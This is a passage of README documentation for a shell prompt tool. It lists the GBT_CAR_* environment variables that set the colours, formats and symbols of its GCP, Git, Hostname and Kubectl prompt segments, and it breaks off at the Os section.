The following example shows how to change the project\n `my-dev-project-123456` to `dev` and the project `my-prod-project-654321` to\n `prod`.\n\n ```shell\n export GBT_CAR_GCP_PROJECT_ALIASES='\n my-dev-project-123456=dev,\n my-prod-project-654321=prod,\n '\n ```\n\n- `GBT_CAR_GCP_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_GCP_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_GCP_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Git` car\n\nCar that displays information about a local Git repository. This car is\ndisplayed only if the current directory is a Git repository.\n\n- `GBT_CAR_GIT_BG='light_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_GIT_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_GIT_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_GIT_FORMAT=' {{ Icon }} {{ Head }} {{ Status }}{{ Ahead }}{{ Behind }} '`\n\n Format of the car.\n\n- `GBT_CAR_GIT_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_TEXT='\ue0a0'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_HEAD_BG`\n\n Background color of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_FG`\n\n Foreground color of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_FM`\n\n Formatting of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_TEXT`\n\n Text content of the `{{ Head }}` element - branch, tag name or the\n commit ID.\n\n- `GBT_CAR_GIT_STATUS_BG`\n\n Background color of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FG`\n\n Foreground color of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FM`\n\n Formatting of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FORMAT`\n\n Format of the `{{ Status }}` element. The content is either\n `{{ StatusDirty }}` or `{{ StatusClean }}` depending on the state of the\n local Git repository.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_BG`\n\n Background color of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_FG='red'`\n\n Foreground color of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_FM`\n\n Formatting of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_TEXT='\u2718'`\n\n Text content of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_BG`\n\n Background color of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_FG='green'`\n\n Foreground color of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_FM`\n\n Formatting of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_TEXT='\u2714'`\n\n Text content of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_BG`\n\n Background color of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FG`\n\n Foreground color of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FM`\n\n Formatting of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FORMAT='{{ StatusAddedSymbol }}'`\n\n Format of the the `{{ StatusAdded }}` element. 
It can be\n `{{ StatusAddedSymbol }}` or `{{ StatusAddedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_BG`\n\n Background color of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_FM`\n\n Formatting of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_TEXT=' \u27f4'`\n\n Text content of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_BG`\n\n Background color of the `{{ StatusAddedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_FG`\n\n Foreground color of the `{{ StatusAddedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_FM`\n\n Formatting of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_TEXT`\n\n Text content of the `{{ StatusAddedCount }}` element. By default it contains\n a number of added files.\n\n- `GBT_CAR_GIT_STATUS_COPIED_BG`\n\n Background color of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FG`\n\n Foreground color of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FM`\n\n Formatting of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FORMAT='{{ StatusCopiedSymbol }}'`\n\n Format of the the `{{ StatusCopied }}` element. It can be\n `{{ StatusCopiedSymbol }}` or `{{ StatusCopiedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_BG`\n\n Background color of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_FM`\n\n Formatting of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_TEXT=' \u2948'`\n\n Text content of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_BG`\n\n Background color of the `{{ StatusCopiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_FG`\n\n Foreground color of the `{{ StatusCopiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_FM`\n\n Formatting of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_TEXT`\n\n Text content of the `{{ StatusCopiedCount }}` element. By default it contains\n a number of files copied.\n\n- `GBT_CAR_GIT_STATUS_DELETED_BG`\n\n Background color of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FG`\n\n Foreground color of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FM`\n\n Formatting of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FORMAT='{{ StatusDeletedSymbol }}'`\n\n Format of the the `{{ StatusDeleted }}` element. 
It can be\n `{{ StatusDeletedSymbol }}` or `{{ StatusDeletedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_BG`\n\n Background color of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_FM`\n\n Formatting of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_TEXT=' \u2796'`\n\n Text content of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_BG`\n\n Background color of the `{{ StatusDeletedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_FG`\n\n Foreground color of the `{{ StatusDeletedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_FM`\n\n Formatting of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_TEXT`\n\n Text content of the `{{ StatusDeletedCount }}` element. By default it contains\n a number of deleted files.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_BG`\n\n Background color of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FG`\n\n Foreground color of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FM`\n\n Formatting of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FORMAT='{{ StatusIgnoredSymbol }}'`\n\n Format of the the `{{ StatusIgnored }}` element. It can be\n `{{ StatusIgnoredSymbol }}` or `{{ StatusIgnoredCount }}`.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_BG`\n\n Background color of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_FM`\n\n Formatting of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_BG`\n\n Background color of the `{{ StatusIgnoredCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_FG`\n\n Foreground color of the `{{ StatusIgnoredCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_FM`\n\n Formatting of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_TEXT`\n\n Text content of the `{{ StatusIgnoredCount }}` element. By default it contains\n a number of ignored files.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_BG`\n\n Background color of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FG`\n\n Foreground color of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FM`\n\n Formatting of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FORMAT='{{ StatusModifiedSymbol }}'`\n\n Format of the the `{{ StatusModified }}` element. 
It can be\n `{{ StatusModifiedSymbol }}` or `{{ StatusModifiedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_BG`\n\n Background color of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_FM`\n\n Formatting of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_BG`\n\n Background color of the `{{ StatusModifiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_FG`\n\n Foreground color of the `{{ StatusModifiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_FM`\n\n Formatting of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_TEXT`\n\n Text content of the `{{ StatusModifiedCount }}` element. By default it\n contains a number of modified files.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_BG`\n\n Background color of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FG`\n\n Foreground color of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FM`\n\n Formatting of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FORMAT='{{ StatusRenamedSymbol }}'`\n\n Format of the the `{{ StatusRenamed }}` element. It can be\n `{{ StatusRenamedSymbol }}` or `{{ StatusRenamedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_BG`\n\n Background color of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_FM`\n\n Formatting of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_BG`\n\n Background color of the `{{ StatusRenamedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_FG`\n\n Foreground color of the `{{ StatusRenamedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_FM`\n\n Formatting of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_TEXT`\n\n Text content of the `{{ StatusRenamedCount }}` element. By default it contains\n a number of renamed files.\n\n- `GBT_CAR_GIT_STATUS_STAGED_BG`\n\n Background color of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FG`\n\n Foreground color of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FM`\n\n Formatting of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FORMAT='{{ StatusStagedSymbol }}'`\n\n Format of the the `{{ StatusStaged }}` element. 
It can be\n `{{ StatusStagedSymbol }}` or `{{ StatusStagedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_BG`\n\n Background color of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_FM`\n\n Formatting of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_BG`\n\n Background color of the `{{ StatusStagedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_FG`\n\n Foreground color of the `{{ StatusStagedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_FM`\n\n Formatting of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_TEXT`\n\n Text content of the `{{ StatusStagedCount }}` element. By default it contains\n a number of staged files.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_BG`\n\n Background color of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FG`\n\n Foreground color of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FM`\n\n Formatting of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FORMAT='{{ StatusUnmergedSymbol }}'`\n\n Format of the the `{{ StatusUnmerged }}` element. It can be\n `{{ StatusUnmergedSymbol }}` or `{{ StatusUnmergedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_BG`\n\n Background color of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_FM`\n\n Formatting of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_BG`\n\n Background color of the `{{ StatusUnmergedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_FG`\n\n Foreground color of the `{{ StatusUnmergedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_FM`\n\n Formatting of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_TEXT`\n\n Text content of the `{{ StatusUnmergedCount }}` element. By default it\n contains a number of unmerged files.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_BG`\n\n Background color of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FG`\n\n Foreground color of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FM`\n\n Formatting of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FORMAT='{{ StatusUntrackedSymbol }}'`\n\n Format of the the `{{ StatusUntracked }}` element. 
It can be\n `{{ StatusUntrackedSymbol }}` or `{{ StatusUntrackedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_BG`\n\n Background color of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_FM`\n\n Formatting of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_BG`\n\n Background color of the `{{ StatusUntrackedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_FG`\n\n Foreground color of the `{{ StatusUntrackedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_FM`\n\n Formatting of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_TEXT`\n\n Text content of the `{{ StatusUntrackedCount }}` element. By default it\n contains a number of untracked files.\n\n- `GBT_CAR_GIT_AHEAD_BG`\n\n Background color of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FG`\n\n Foreground color of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FM`\n\n Formatting of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FORMAT='{{ AheadSymbol }}'`\n\n Format of the the `{{ Ahead }}` element. It can be `{{ AheadSymbol }}` or\n `{{ AheadCount }}`.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_BG`\n\n Background color of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_FG`\n\n Foreground color of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_FM`\n\n Formatting of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_BG`\n\n Background color of the `{{ AheadCount }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_FG`\n\n Foreground color of the `{{ AheadCount }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_FM`\n\n Formatting of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_TEXT`\n\n Text content of the `{{ AheadCount }}` element. By default it contains\n a number of commits ahead of the remote branch.\n\n- `GBT_CAR_GIT_BEHIND_BG`\n\n Background color of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FG`\n\n Foreground color of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FM`\n\n Formatting of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FORMAT='{{ BehindSymbol }}'`\n\n Format of the the `{{ Behind }}` element. It can be `{{ BehindSymbol }}` or\n `{{ BehindCount }}`.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_BG`\n\n Background color of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_FG`\n\n Foreground color of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_FM`\n\n Formatting of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_TEXT=' \u2b07'`\n\n Text content of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_BG`\n\n Background color of the `{{ BehindCount }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_FG`\n\n Foreground color of the `{{ BehindCount }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_FM`\n\n Formatting of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_TEXT`\n\n Text content of the `{{ BehindCount }}` element. 
By default it contains\n a number of commits ahead of the remote branch.\n\n- `GBT_CAR_GIT_STASH_BG`\n\n Background color of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FG`\n\n Foreground color of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FM`\n\n Formatting of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FORMAT='{{ StashSymbol }}'`\n\n Format of the the `{{ Stash }}` element. It can be `{{ StashSymbol }}` or\n `{{ StashCount }}`.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_BG`\n\n Background color of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_FG`\n\n Foreground color of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_FM`\n\n Formatting of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_TEXT=' \u2691'`\n\n Text content of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_BG`\n\n Background color of the `{{ StashCount }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_FG`\n\n Foreground color of the `{{ StashCount }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_FM`\n\n Formatting of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_TEXT`\n\n Text content of the `{{ StashCount }}` element. By default it contains\n a number of stashes.\n\n- `GBT_CAR_GIT_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_GIT_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_GIT_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Hostname` car\n\nCar that displays username of the currently logged user and the hostname of the\nlocal machine.\n\n- `GBT_CAR_HOSTNAME_BG='dark_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_HOSTNAME_FG='252'`\n\n Foreground color of the car.\n\n- `GBT_CAR_HOSTNAME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_HOSTNAME_FORMAT=' {{ UserHost }} '`\n\n Format of the car.\n\n- `GBT_CAR_HOSTNAME_USERHOST_BG`\n\n Background color of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FG`\n\n Foreground color of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FM`\n\n Formatting of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FORMAT`\n\n Format of the `{{ UserHost }}` element. The value is either\n `{{ Admin }}@{{ Host }}` if the user is `root` or `{{ User }}@{{ Host }}`\n if the user is a normal user.\n\n- `GBT_CAR_HOSTNAME_ADMIN_BG`\n\n Background color of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_FG`\n\n Foreground color of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_FM`\n\n Formatting of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_TEXT`\n\n Text content of the `{{ Admin }}` element. The user name.\n\n- `GBT_CAR_HOSTNAME_USER_BG`\n\n Background color of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_FG`\n\n Foreground color of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_FM`\n\n Formatting of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_TEXT`\n\n Text content of the `{{ User }}` element. 
The user name.\n\n- `GBT_CAR_HOSTNAME_HOST_BG`\n\n Background color of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_FG`\n\n Foreground color of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_FM`\n\n Formatting of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_TEXT`\n\n Text content of the `{{ Host }}` element. The host name.\n\n- `GBT_CAR_HOSTNAME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_HOSTNAME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_HOSTNAME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Kubectl` car\n\nCar that displays `kubectl` information.\n\n- `GBT_CAR_KUBECTL_BG='26'`\n\n Background color of the car.\n\n- `GBT_CAR_KUBECTL_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_KUBECTL_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_KUBECTL_FORMAT=' {{ Icon }} {{ Context }} '`\n\n Format of the car. `{{ Cluster }}`, `{{ AuthInfo }}` and `{{ Namespace }}`\n can be used here as well.\n\n- `GBT_CAR_KUBECTL_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_TEXT='\u2388'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_BG`\n\n Background color of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_FG`\n\n Foreground color of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_FM`\n\n Formatting of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_TEXT`\n\n Text content of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_BG`\n\n Background color of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_FG`\n\n Foreground color of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_FM`\n\n Formatting of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_TEXT`\n\n Text content of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_BG`\n\n Background color of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_FG`\n\n Foreground color of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_FM`\n\n Formatting of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_TEXT`\n\n Text content of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_BG`\n\n Background color of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_FG`\n\n Foreground color of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_FM`\n\n Formatting of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_TEXT`\n\n Text content of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_KUBECTL_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_KUBECTL_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Os` car\n\nCar 
